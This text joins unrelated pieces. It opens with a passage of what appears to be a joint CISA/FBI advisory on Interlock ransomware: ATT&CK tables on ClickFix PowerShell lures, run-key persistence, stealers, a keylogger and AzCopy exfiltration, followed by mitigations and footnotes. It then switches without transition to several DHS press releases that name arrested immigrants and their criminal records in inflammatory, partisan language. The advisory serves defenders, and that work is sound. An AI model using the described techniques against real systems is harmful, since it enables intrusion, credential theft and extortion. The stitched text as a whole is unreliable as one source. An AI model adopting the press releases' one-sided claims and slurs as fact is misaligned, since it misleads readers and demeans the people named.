Drive-By Compromise | T1189 | Interlock actors obtain initial access by compromising a legitimate website that network users visit, or by disguising malicious payloads as fake browser updates or common security software, including the following:17 FortiClient.exe, Ivanti-Secure-Access-Client.exe, GlobalProtect.exe, Webex.exe, AnyConnectVPN.exe, Cisco-Secure-Client.exe, and zyzoom_antimalware.exe. Interlock actors also gain access via the ClickFix social engineering technique, in which users are tricked into executing a malicious payload by clicking on a fake CAPTCHA that prompts users to execute a malicious PowerShell script.

Table 6. Execution
Technique Title | ID | Use
Command and Scripting Interpreter: PowerShell | T1059.001 | Interlock actors implement PowerShell scripts to drop a malicious file into the Windows Startup folder. Interlock actors execute a PowerShell command for registry key modification. Interlock actors use a PowerShell script to execute a series of commands to facilitate reconnaissance.
User Execution: Malicious Copy and Paste | T1204.004 | Via the ClickFix social engineering technique, users are tricked into clicking a fake CAPTCHA and prompted into executing a malicious Base64-encoded PowerShell process by following instructions to open a Windows Run window (Windows Button + R), pasting clipboard contents (“CTRL + V”), and then executing the malicious script (“Enter”).

Table 7. Persistence
Technique Title | ID | Use
Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder | T1547.001 | Interlock actors establish persistence by adding a file into a Windows StartUp folder that executes a RAT every time a user logs in. Interlock actors also implement registry key modification by using a PowerShell command to add a run key value (named “Chrome Updater”) that uses a log file as an argument every time a user logs in.

Table 8. Privilege Escalation
Technique Title | ID | Use
Valid Accounts: Domain Accounts | T1078.002 | Interlock actors compromise domain administrator accounts to gain additional privileges.

Table 9. Defense Evasion
Technique Title | ID | Use
Defense Evasion | TA0005 | Interlock actors execute the removeme function on Linux systems to delete the encryption binary for defense evasion.
Masquerading: Match Legitimate Resource Name or Location | T1036.005 | Interlock actors disguise a malicious run key value by naming it “Chrome Updater”; the run key value uses a specific log file as an argument upon user login. Interlock actors disguise files of keystrokes logged by one of their credential stealers with a legitimate Windows filename: conhost.txt. Interlock actors disguise an encryption binary, a 64-bit executable, by giving it the same name as the legitimate Console Windows Host executable: conhost.exe.
System Binary Proxy Execution: Rundll32 | T1218.011 | Interlock actors use rundll32.exe to proxy execution of a malicious DLL binary, tmp41.wasd.
Indicator Removal: File Deletion | T1070.004 | Interlock actors execute a DLL binary, tmp41.wasd, that uses the remove() function to delete their encryption binary for defense evasion.

Table 10. Credential Access
Technique Title | ID | Use
Credential Access | TA0006 | Interlock actors download the credential stealer cht.exe and execute other versions of information stealers (including Lumma Stealer and Berserk Stealer) to harvest credentials.
Credentials from Password Stores: Credentials from Web Browsers | T1555.003 | Interlock actors download a credential stealer that collects login information and associated URLs for victims’ online accounts.
Input Capture | T1056 | Interlock actors execute Lumma Stealer and Berserk Stealer information stealers on victim systems.
Input Capture: Keylogging | T1056.001 | Interlock actors download klg.dll, a keylogger binary, onto compromised systems, where it logs users’ keystrokes in a file named conhost.txt.
Steal or Forge Kerberos Tickets: Kerberoasting | T1558.003 | Interlock actors possibly use a Kerberoasting attack to compromise domain administrator accounts.

Table 11. Discovery
Technique Title | ID | Use
System Owner/User Discovery | T1033 | Interlock actors execute the PowerShell command WindowsIdentity.GetCurrent() on victim systems to retrieve a WindowsIdentity object that represents the current Windows user.
System Information Discovery | T1082 | Interlock actors execute the PowerShell command systeminfo on victim systems to access detailed configuration information about the system, including OS configuration, security information, product ID, and hardware properties. Interlock actors execute the PowerShell command Get-PSDrive on victim systems to discover the drives in the current session, such as Windows logical drives on the computer (including drives mapped to network shares), drives exposed by PowerShell providers, and session-specified temporary drives and persistent mapped network drives.
System Service Discovery | T1007 | Interlock actors execute the PowerShell command tasklist /svc on victim systems, which lists service information for each process currently running on the system. Actors also execute the PowerShell command Get-Service on victim systems, which retrieves objects that represent the services (including running and stopped services) on the system.
System Network Configuration Discovery | T1016 | Interlock actors execute the PowerShell command arp -a on victim systems, which displays and modifies entries in the Address Resolution Protocol (ARP) cache table (which contains entries on the IPv4 and IPv6 addresses on host endpoints).

Table 12. Lateral Movement
Technique Title | ID | Use
Valid Accounts | T1078 | Interlock actors harvest and abuse valid credentials for lateral movement and privilege escalation.
Remote Services: Remote Desktop Protocol | T1021.001 | Interlock actors use RDP and valid credentials to move laterally between systems.

Table 13. Collection
Technique Title | ID | Use
Data from Cloud Storage | T1530 | Interlock actors use StorageExplorer.exe, the cloud storage solution Azure Storage Explorer, to explore Microsoft Azure Storage accounts.

Table 14. Command and Control
Technique Title | ID | Use
Command and Control | TA0011 | Interlock actors use the applications Cobalt Strike and SystemBC for C2.
Ingress Tool Transfer | T1105 | Interlock actors use a fake Google Chrome or Microsoft Edge browser update to cause users to execute a RAT on the victimized system. Interlock actors download credential stealers (cht.exe) and keylogger binaries (klg.dll) once actors establish remote control of a compromised system.
Remote Access Tools | T1219 | Interlock actors use legitimate remote access tools such as AnyDesk to enable remote connectivity and PuTTY to assist with lateral movement.

Table 15. Exfiltration
Technique Title | ID | Use
Exfiltration Over Web Service: Exfiltration to Cloud Storage | T1567.002 | Interlock actors exfiltrate data to cloud storage by executing AzCopy to upload data to the Azure storage blob.
Exfiltration Over Alternative Protocol | T1048 | Interlock actors use file transfer tools like WinSCP to exfiltrate data.

Table 16. Impact
Technique Title | ID | Use
Data Encrypted for Impact | T1486 | Interlock actors encrypt victim data using a combined AES and RSA algorithm on compromised systems to interrupt availability to system and network resources. Actors code encryptors using C/C++. Interlock actors use encryptors for both Windows and Linux operating systems. Interlock actors also use a FreeBSD ELF encryptor to encrypt victim data.
Financial Theft | T1657 | Interlock actors deliver a ransom note titled !__README__!.txt via a GPO, which provides victims with instructions to use a .onion URL to contact the actors over the Tor network. Actors use a double-extortion model, both encrypting victim data and threatening release of victim data on their Tor network leak site if the ransom is not paid.

Mitigations

The authoring agencies recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the Interlock ransomware actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s CPGs webpage for more information on the CPGs, including additional recommended baseline protections.

In addition to the below mitigations, Healthcare and Public Health (HPH) organizations should use HPH Sector CPGs to implement cybersecurity protections to address the most common threats and TTPs used against this sector.

At-risk organizations should implement the following mitigations:

  • Prevent Interlock ransomware actors from obtaining initial access:
    • Implement domain name system (DNS) filtering to block users from accessing malicious sites and applications.
    • Implement web access firewalls to mitigate and prevent unknown commands or process injection from malicious domains or websites.
    • Train users [CPG 2.I] to identify, avoid, and report social engineering attempts.
  • Implement a recovery plan [CPG 5.A] to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud) [CPG 2.R].
  • Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with NIST password standards.
    • Require employees to use long passwords [CPG 2.B] and consider not requiring recurring password changes, as these can weaken security.
  • Require MFA [CPG 2.H] for all services to the extent possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems.
    • Implement identity, credential, and access management (ICAM) policies across the organization as a precursor to MFA.
  • Keep all operating systems, software, and firmware up to date; prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
    • Timely patching is efficient and cost effective for minimizing an organization’s exposure to cybersecurity threats.
  • Implement robust EDR capabilities on VMs, systems, and networks.
  • Segment networks [CPG 2.F] to prevent the spread of ransomware.
    • Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware [CPG 3.A] with a networking monitoring tool [CPG 2.T].
    • To aid in detecting ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network.
    • Implement EDR tools; these are useful for detecting lateral connections as they provide insight into common and uncommon network connections for each host.
  • Filter network traffic by preventing unknown or untrusted origins from accessing remote services on internal systems.
    • This prevents threat actors from directly connecting to remote access services that they have established for persistence.
  • Install, regularly update, and enable real time detection for antivirus software on all hosts.
  • Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
  • Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 2.E].
  • Disable unused ports.
  • Consider adding an email banner to emails received from outside of your organization [CPG 2.M].
  • Disable hyperlinks in received emails.
  • Implement time-based access for accounts set at the admin level and higher; for example, the just-in-time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model):
    • This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need.
    • Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
  • Disable command line and scripting activities and permissions [CPG 2.N].
    • Disabling software utilities that run from the command line makes it more difficult for threat actors to escalate privileges and move laterally.
  • Maintain offline backups of data and regularly maintain backups and restorations [CPG 2.R]; this avoids severe service interruption and irretrievable data in the event of a compromise.
  • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.R].

In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 5 through Table 16).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

Your organization has no obligation to respond or provide information back to FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to FBI, reporting must be consistent with applicable state and federal laws.

FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.

Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.

The authoring agencies do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to FBI’s Internet Crime Complaint Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (contact@mail.cisa.dhs.gov) or by calling 1-844-Say-CISA (1-844-729-2472).

State, local, tribal, and territorial governments should report incidents to the MS-ISAC (SOC@cisecurity.org or 866-787-4722).

HPH Sector organizations should report incidents to FBI or CISA but also can reach out to HHS at HHScyber@hhs.gov for cyber incident support focused on mitigating adverse patient impacts.

The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favor by the authoring agencies. 

Cisco Talos contributed to this advisory.

July 22, 2025: Initial version.

1 Elio Biasiotto et al., “Unwrapping the Emerging Interlock Ransomware Attack,” Talos Intelligence (blog), Cisco Talos, last modified November 7, 2024, https://blog.talosintelligence.com/emerging-interlock-ransomware/.

2 Sekoia Threat Detection and Research team, “Interlock Ransomware Evolving Under the Radar,” Sekoia (blog), Sekoia, last modified April 16, 2025, https://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/.

3 Yashvi Shah and Vignesh Dhatchanamoorthy, “ClickFix Deception: A Social Engineering Tactic to Deploy Malware,” McAfee Labs (blog), McAfee, last modified June 11, 2024, https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clickfix-deception-a-social-engineering-tactic-to-deploy-malware/ and “HC3 Sector Alert: ClickFix Attacks,” Health Sector Cybersecurity Coordination Center, Department of Health and Human Services, last modified October 29, 2024, https://www.hhs.gov/sites/default/files/clickfix-attacks-sector-alert-tlpclear.pdf.

4 Shah, “ClickFix Deception: A Social Engineering Tactic to Deploy Malware.”

5 Sekoia Threat Detection and Research team, “Interlock Ransomware Evolving Under the Radar.”

6 Bill Toulas, “Interlock Ransomware Gang Deploys New NodeSnake RAT on Universities,” Bleeping Computer, May 28, 2025, https://www.bleepingcomputer.com/news/security/interlock-ransomware-gang-deploys-new-nodesnake-rat-on-universities/.

7 Biasiotto, “Unwrapping the Emerging Interlock Ransomware Attack.”

8 International law enforcement and Microsoft took down the Lumma Stealer malware in May 2025 by seizing the internet domains the actors used to distribute the malware and taking down the domains that hosted its infrastructure. For more information, see Tara Seals, “Lumma Stealer Takedown Reveals Sprawling Operation,” Dark Reading, May 21, 2025, https://www.darkreading.com/cybersecurity-operations/lumma-stealer-takedown-sprawling-operation, and Steven Masada, “Disrupting Lumma Stealer: Microsoft Leads Global Action Against Favored Cybercrime Tool,” Microsoft On the Issues (blog), Microsoft, last modified May 21, 2025, https://blogs.microsoft.com/on-the-issues/2025/05/21/microsoft-leads-global-action-against-favored-cybercrime-tool/.

9 Sekoia Threat Detection and Research team, “Interlock Ransomware Evolving Under the Radar.”

10 Biasiotto, “Unwrapping the Emerging Interlock Ransomware Attack.”

11 Biasiotto, “Unwrapping the Emerging Interlock Ransomware Attack.”

12 Biasiotto, “Unwrapping the Emerging Interlock Ransomware Attack.”

13 Biasiotto, “Unwrapping the Emerging Interlock Ransomware Attack.”

14 Lawrence Abrams, “Meet Interlock — The New Ransomware Targeting FreeBSD Servers,” Bleeping Computer, November 3, 2024, https://www.bleepingcomputer.com/news/security/meet-interlock-the-new-ransomware-targeting-freebsd-servers/.

15 Biasiotto, “Unwrapping the Emerging Interlock Ransomware Attack.”

16 Graham Cluley, “Interlock Ransomware: What You Need to Know,” Fortra (blog), Fortra, last modified May 30, 2025, https://www.tripwire.com/state-of-security/interlock-ransomware-what-you-need-know.

17 Sekoia Threat Detection and Research team, “Interlock Ransomware Evolving Under the Radar.”

ICE Arrests Worst of Worst Criminal Illegal Aliens

Source: US Department of Homeland Security

70% of ICE’s arrests have been of illegal aliens convicted or charged with crimes

WASHINGTON – Today, the Department of Homeland Security (DHS) highlighted U.S. Immigration and Customs Enforcement (ICE) officers’ arrests of the worst of the worst criminal illegal aliens from across the United States.  

“President Trump and Secretary Noem have unleashed ICE to target the worst of the worst. Our brave law enforcement is facing an 830% increase in assaults against them and yet they continue to arrest violent criminals and drug traffickers every single day,” said Assistant Secretary Tricia McLaughlin. “We will not allow sanctuary politicians, activist hacks, or rioters to stand in our way of protecting the American people. Our message is clear: criminal illegal aliens are not welcome in the United States.”

  • ICE Baltimore arrested Olinda Micaela Gonzalez-Ortiz, a 21-year-old illegal alien from Guatemala. Her criminal history includes a conviction for hit and run in Salisbury, MD. 


  • ICE Denver arrested Federico Fong-Nunez, a 53-year-old illegal alien from Mexico. He has 21 criminal convictions including burglary, aggravated assault, and felony menacing, in Boulder, CO.


  • ICE Los Angeles arrested Luis Alberto Leonardo Cortes-Rivera, a 34-year-old illegal alien from Mexico. He has nine criminal convictions including grand theft, burglary, and tampering with a vehicle, in Los Angeles, CA. 


  • ICE Dallas arrested Rureiro Falkao, a 46-year-old illegal alien from Honduras. His criminal history includes a conviction for possession of methamphetamine, in Oklahoma City, OK.


  • ICE Houston arrested Jhon Jervis Chavez-De La Rosa, a 21-year-old illegal alien from Venezuela. His criminal history includes a conviction for assault causing bodily injury, in Houston, TX.


###

DHS Sets the Record Straight: ICE Never Deported Media’s “Allentown Grandfather”

Source: US Department of Homeland Security

The media fell for another hoax designed to demonize ICE law enforcement

WASHINGTON – Today, the Department of Homeland Security (DHS) set the record straight on misleading and false reporting that U.S. Immigration and Customs Enforcement (ICE) “secretly deported” a so-called “Allentown grandfather” to Guatemala. Additionally, reporting claimed he “died” in ICE custody.

The Morning Call, an Allentown, Pennsylvania, newspaper published the following headline on July 20, 2025, without any facts from DHS about major allegations made against law enforcement:


The family of the individual allegedly told reporters he was handcuffed and taken by federal officers at a green card appointment in Philadelphia. This claim is completely false. There is no record of the man appearing at any green card appointment in or around the area of Philadelphia on June 20, 2025.

Furthermore, ICE has not deported Luis Leon—a Chilean national—to Guatemala, as his family members have said. ICE’s only record of this individual entering the U.S. is in 2015 from Chile under the visa waiver program.

According to reporting by the Associated Press, the Guatemalan Institute of Migration—which coordinates with ICE on all deportations from the U.S. to Guatemala—claims they have not received anyone matching the name, age or nationality of Luis Leon back into Guatemala.


According to the report, the family alleges a woman claiming to be an immigration lawyer called and offered to help them but did not disclose how she knew about the case. The family claims this individual also told them Leon died in ICE custody.

“ICE never arrested or deported Luis Leon to Guatemala. Nor does ICE ‘disappear’ people—this is a categorical lie being peddled to demonize ICE agents who are already facing an 830% increase in assaults against them. This was a hoax peddled by the media who rushed to press without pausing to corroborate the facts with DHS. This was journalistic malpractice,” said Assistant Secretary McLaughlin.

# # #

Second Criminal Illegal Alien with Lengthy Rap Sheet Arrested for Involvement in Ambush and Shooting CBP Officer in New York City

Source: US Department of Homeland Security

Both criminal illegal aliens involved in the attempted armed robbery were released into the country under the Biden Administration and NYC sanctuary politicians ignored detainer

NEW YORK – Today, the Department of Homeland Security arrested Cristian Aybar Berroa, a criminal illegal alien and the second suspect involved in the attempted armed robbery of a U.S. Customs and Border Protection Officer who was off duty in New York City in Fort Washington Park under the George Washington Bridge on July 19. The first suspect, Miguel Francisco Mora Nunez, also a criminal illegal alien, who shot the CBP officer, was arrested yesterday.

A witness of the attack stated that she and the victim were sitting on the rocks by the water when two subjects on a scooter drove up to them, dismounted the scooter and approached them with a firearm drawn. The off-duty CBP officer responded by withdrawing his own firearm in self defense. The CBP officer was shot in his right arm and left cheek. Thankfully, the officer is in stable condition at the hospital.

Cristian Aybar Berroa, a criminal illegal alien from the Dominican Republic, illegally entered the United States on June 19, 2022, and was released into the country on interim parole pending his immigration hearing. New York City ignored his detainer.


This criminal illegal alien’s rap sheet includes:

  • On May 10, 2023, the New York City Police Department (NYPD) arrested Berroa for 2nd degree reckless endangerment.
  • On March 26, 2024, NYPD arrested Berroa for 4th degree felony grand larceny and petit larceny.
  • On April 5, 2024, NYPD arrested him for 4th degree felony grand larceny and petit larceny. Despite an active ICE detainer, the New York City Department of Corrections released Berroa back onto NYC streets.
  • On February 20, 2025, NYPD arrested Berroa for 2nd degree reckless endangerment, reckless driving, and for driving without a license.
  • On June 12, 2025, Berroa pled guilty to petit larceny at the Bronx County Supreme Court. This plea was made in consolidation of all his previous arrests, and he was conditionally discharged and allowed to roam the streets of NYC.

A judge issued Berroa a final order of removal on January 3, 2023.

The other assailant in the attack is Miguel Francisco Mora Nunez, a criminal illegal alien from the Dominican Republic. He illegally entered the United States on April 4, 2023, and was released by the Biden Administration into the country.


This criminal illegal alien’s rap sheet includes:

  • On October 11, 2023, the New York City Police Department (NYPD) arrested and charged Nunez with felony grand larceny, petit larceny, and reckless driving.
  • On October 1, 2024, the NYPD arrested and charged Nunez with 2nd and 3rd degree assault.
  • On November 30, 2024, the NYPD arrested Nunez for criminal contempt. On January 13, 2025, he was again arrested for criminal contempt.
  • On February 21, 2025, the Leominster Police Department in Massachusetts issued a criminal warrant for Nunez for armed robbery with a firearm.

After failing to show up for his immigration hearing, a judge issued Nunez a final order of removal on November 6, 2024.

“These violent thugs had committed a smorgasbord of crimes and been arrested multiple times and yet New York continued to release them, ignore an ICE detainer and allow them to continue to prey on Americans and terrorize our streets. How many people have to die, how many lives have to be changed forever for Mayor Adams and his sanctuary politician ilk to end these performative politics?” said Assistant Secretary Tricia McLaughlin.

# # #

ICE Arrests Murderers, Pedophiles, and Rapists Over the Weekend

Source: US Department of Homeland Security

Under President Trump and Secretary Noem, ICE is working around-the-clock to remove the worst of the worst from American communities

WASHINGTON – Today, the Department of Homeland Security (DHS) released the names and rap sheets of criminal illegal aliens arrested over the weekend—including murderers, pedophiles, and rapists. 

“Over the weekend, our brave ICE agents arrested more depraved criminal illegal aliens including murderers, rapists, and three child pedophiles. These are the types of barbaric criminals our ICE law enforcement is arresting and removing from American communities every day,” said Assistant Secretary Tricia McLaughlin. “Despite an 830 percent surge in assaults against our ICE law enforcement officers, they continue to put their lives on the line to make American communities safer every day.”

Below are some of the criminal illegal aliens arrested over the weekend:

  • ICE Dallas arrested Jose Arinaga-Ramirez, a 58-year-old illegal alien from Mexico, convicted of aggravated sexual assault of a child in San Antonio, TX. 


  • ICE Los Angeles arrested Chue Vue, a 37-year-old illegal alien from Laos, convicted of attempted murder and seven counts of assault with deadly weapon/instrument non-firearm that produced great bodily injury in Riverside, CA. 


  • ICE Philadelphia arrested Gil Salinas-Anaclo, a 35-year-old illegal alien from Peru, convicted of larceny in Northampton County, PA. 


  • ICE Houston arrested Gilmer Vertiz-Bustemante, a 37-year-old illegal alien from Mexico, convicted of murder in Tarrant County, TX.


  • ICE Buffalo arrested Andra Adams Scott, a 30-year-old illegal alien from Jamaica, convicted of attempted robbery in Queens County, NY. 


  • ICE Los Angeles arrested Henry Jose Marquez, a 55-year-old illegal alien from Venezuela, convicted of smuggling cocaine in Tampa, FL. 


  • ICE Boston arrested Jovinnel Giron Meneses, a 29-year-old illegal alien from the Philippines, convicted of aggravated rape of a child, rape of a child with force, four counts of indecent assault and battery on a child under 14, and two counts of indecent assault and battery on a person over 14 in Middlesex, MA.


  • ICE Philadelphia arrested Juan Ramirez-Velasquez, a 27-year-old illegal alien from Guatemala, convicted of rape of a victim under 12 years old in Dover, DE. 


  • ICE Atlanta arrested Emmanuel Evariste, a 39-year-old illegal alien from Haiti, convicted in the United States District Court, Boston District of conspiracy to possess with intent to distribute cocaine.


  • ICE Buffalo arrested Sakir Akkan, a 22-year-old illegal alien from Turkey, convicted of rape in the third degree: anal sexual contact with a person incapable of consent in Albany County, NY.


  • ICE St. Louis arrested Nodir Negmatov, an illegal alien from Uzbekistan, who was attempting to pick up U.S. Department of State International Traffic in Arms Regulations (ITAR) controlled Joint Direct Attack Munition (JDAM) guidance kits, which convert unguided bombs into all-weather precision-guided munitions, at a Boeing plant in St. Charles, Missouri. 


###

VIDEO: Criminal Illegal Alien with Lengthy Rap Sheet Ambushes and Shoots CBP Officer in New York City

Source: US Department of Homeland Security

The suspect is a criminal illegal alien from the Dominican Republic who was apprehended at the southern border and released into the country under the Biden Administration

WASHINGTON – Today, the Department of Homeland Security lodged a detainer against an illegal alien accused of ambushing and shooting a U.S. Customs and Border Protection Officer who was off duty in New York City in Fort Washington Park under the George Washington Bridge on July 19 at approximately 11:51 PM ET.  

A witness of the attack—believed to be an attempted robbery—states that she and the victim were sitting on the rocks by the water when two subjects on a scooter drove up to them and the passenger got off the back and approached them with a firearm drawn. The off-duty CBP officer responded by withdrawing his own firearm in self defense.

The CBP officer was shot in his right arm and left cheek. Thankfully, the officer is in stable condition at the hospital.

Video of the attack is below.


One of the assailants is Miguel Francisco Mora Nunez, a criminal illegal alien from the Dominican Republic. He illegally entered the United States on April 4, 2023, and was released by the Biden Administration into the country. 


This criminal illegal alien’s rap sheet includes:  

  • On October 11, 2023, the New York City Police Department (NYPD) arrested and charged Nunez with felony grand larceny, petit larceny, and reckless driving.  
  • On October 1, 2024, the NYPD arrested and charged Nunez with 2nd and 3rd degree assault.
  • On November 30, 2024, the NYPD arrested Nunez for criminal contempt. On January 13, 2025, he was again arrested for criminal contempt.
  • On February 21, 2025, the Leominster Police Department in Massachusetts issued a criminal warrant for Nunez for armed robbery with a firearm.  

After failing to show up for his immigration hearing, a judge issued Nunez a final order of removal on November 6, 2024.

“This violent criminal illegal alien had multiple run-ins with NYPD for assault and felony grand larceny before he ambushed and shot a CBP officer. The Biden Administration arrested this criminal illegal alien at the border and chose to release him into our country to terrorize Americans. We are thankful that our brave law enforcement officer is in stable condition,” said Assistant Secretary Tricia McLaughlin. “Sanctuary city politicians allowed this to happen. This suffering is a direct result of lawless sanctuary city policies. Under President Trump and Secretary Noem, DHS will flood the zone in sanctuary cities and remove these criminals one by one. We will not be deterred: if you break America’s laws we will hunt you down, arrest you, and deport you.”   

The other suspect remains at large. Anonymous tips may be reported on this form and via the toll-free ICE tip line, (866) 347-2423.  

# # #

ICE Arrests Criminal Illegal Alien Who Concealed and Abused Body of a Missing Woman After Sanctuary City Judge Freed Illegal Alien onto Streets of Chicago

Source: US Department of Homeland Security

President Trump and Secretary Noem stand with the victims of illegal alien crime

WASHINGTON — On July 19, 2025, U.S. Immigration and Customs Enforcement (ICE) officers in Chicago arrested Luis Mendoza-Gonzalez, a 52-year-old criminal illegal alien from Mexico, who was charged in April with concealing the body of a missing woman in a storage container on his yard for two months, abusing her corpse, and obstruction of justice.


Waukegan Police Department officers discovered the body of 37-year-old victim Megan Bos in a container in Mendoza’s yard in April after she had been reported missing on March 9, 2025.


Her body was found decapitated and in a bleach storage container by officers. Mendoza was charged in April. However, Lake County Judge Randie Bruno released him from custody at the conclusion of his court appearance, after which he was free to roam the Chicago streets.

This criminal illegal alien is currently being held at Lake County Jail in Waukegan, Illinois.

“Every day, ICE is arresting sickos like criminal illegal alien Luis Mendoza-Gonzalez, and stopping them from terrorizing Americans. This depraved alien was charged with concealing the body of a missing woman in a storage container for months and abusing her corpse,” said Assistant Secretary Tricia McLaughlin. “It is absolutely repulsive that a judge freed this monster and allowed him to walk free on Illinois’s streets after allegedly committing such a heinous crime. Under President Trump and Secretary Noem, Megan Bos and her family will have justice.”

Secretary Noem relaunched the Victims of Immigration Crime Engagement (VOICE) office. The VOICE office was shuttered by the previous administration, which left victims of alien crime without access to many key support services and resources. The office was first launched in 2017 by the Trump administration as a dedicated resource for those who have been victimized by crime that has a nexus to immigration.

If you or a loved one has been impacted by a crime committed by an illegal alien, you are not alone. Call 1-855-48-VOICE (1-855-488-6423).

###

Six Months of Keeping America Safe Under President Trump and Secretary Noem

Source: US Department of Homeland Security

DHS has accomplished more in six months than most Administrations achieve in an entire term

WASHINGTON – In just six months, President Trump and Secretary Noem have delivered the American people a long list of victories in their mission to secure the homeland and Make America Safe Again. 

Under their leadership, the Department of Homeland Security (DHS) has closed the southern border, removed violent criminal illegal aliens, restored law and order to our immigration system, supported Americans in times of crisis, revolutionized our Coast Guard to meet the challenges of the 21st Century, and kept Americans safe. 

Secured the Southern Border 

  • On day one, President Trump declared a national emergency at the southern border.    
  • President Trump immediately reinstated “Remain in Mexico” and ended catch-and-release.  
  • Daily border encounters have plunged by 93% since President Trump took office.
  • Under President Trump’s leadership, Immigration and Customs Enforcement (ICE) Homeland Security Investigations (HSI) has located over 10,000 unaccompanied children.
  • Migrants are turning BACK before they even reach our border— migration through Panama’s Darien Gap is down 99%.
  • President Trump—with $46.5 billion from the Big Beautiful Bill—is finishing the border wall. DHS already has more than 85 miles either planned or under construction with funding from the prior year, in addition to hundreds of miles that are now planned to be funded by the bill. President Trump’s Big Beautiful Bill also includes over $5 billion for new technology and border surveillance.
  • With the Big Beautiful Bill, CBP will get the resources they need to keep America safe, including $4.1 billion to hire additional personnel, including 5,000 more customs officers and 3,000 new Border Patrol agents.
  • In June, Customs and Border Protection (CBP) had the lowest number of nationwide encounters in CBP history at 25,228.
  • The number of nationwide apprehensions in June was also a historic low of just 8,024.   
  • Notably, on June 28, Border Patrol recorded only 136 apprehensions across the entire Southwest Border—the lowest single-day total in agency history.
  • And in both May and June, U.S. Border Patrol reported zero parole releases—reinforcing the Administration’s commitment to ending catch-and-release policies.   

Removed the Worst of the Worst Illegal Aliens  

  • The Trump Administration empowered our brave men and women in law enforcement to use common sense to do their jobs effectively. 
  • DHS returned to using the term “illegal alien” which is the statutory language. President Trump will not allow political correctness to hinder law enforcement. 
  • The Trump administration has arrested more than 300,000 illegal aliens in 2025 alone.
  • 70% of ICE arrests are criminal illegal aliens with criminal charges or convictions.     
  • The Big Beautiful Bill will allow ICE to arrest and remove even more criminal aliens by providing $14.4 billion for removals, 10,000 new ICE agents, 80,000 new ICE beds, and a $10,000 signing bonus for new ICE agents. This will help ICE achieve as many as 1 million deportations per year.
  • As part of 287(g), DHS partnered with the State of Florida and opened Alligator Alcatraz, giving the Trump administration the capability to lock up some of the worst scumbags who entered the country illegally under the previous administration. The new facility expands facility and bed space by the thousands.
  • Operation Tidal Wave, the first 287(g) enforcement operation coordinated with state and federal law enforcement partners, resulted in over 800 arrests.
  • President Trump and Secretary Noem are empowering state and local law enforcement to get these criminal illegal aliens off our streets. DHS has secured more than 800 signed agreements with state and local partnerships under 287(g).    
  • At the direction of President Trump, CBP and ICE began widescale immigration enforcement operations in sanctuary city Los Angeles and southern California. The month-long operation resulted in arresting some of the worst of the worst criminal illegal aliens.
  • In July, federal law enforcement officers executed criminal warrant operations at marijuana grow sites in Carpinteria and Camarillo. At least 14 migrant children have been rescued from potential exploitation, forced labor and human trafficking. Federal officers also arrested at least 361 illegal aliens from both sites in Carpinteria and Camarillo.
  • After weeks of delays by activist judges, the Department of Homeland Security finally deported eight barbaric, violent criminal illegal aliens to South Sudan.    

Delivering Justice for Victims of Illegal Immigration  

  • President Trump and Secretary Noem reopened the Victims of Immigration Crime Engagement (VOICE) office, which was shuttered by the Biden Administration. President Trump and Secretary Noem are standing up for the victims of illegal alien crime and ensuring they have access to much needed resources and support they deserve.    

Incentivizing Historic Self-Deportations 

  • President Trump ended the CBP One app that allowed more than one million aliens to illegally enter the U.S. The Trump Administration replaced this disastrous program with the CBP Home app, which has a new self-deportation reporting feature for aliens illegally in the country.
  • President Trump launched Project Homecoming through a presidential EO. The United States is also offering any illegal alien who uses the CBP Home App a stipend of $1,000 dollars, paid after their return to their home country has been confirmed through the app. So far, tens of thousands of illegal aliens have used the app to self-deport.  
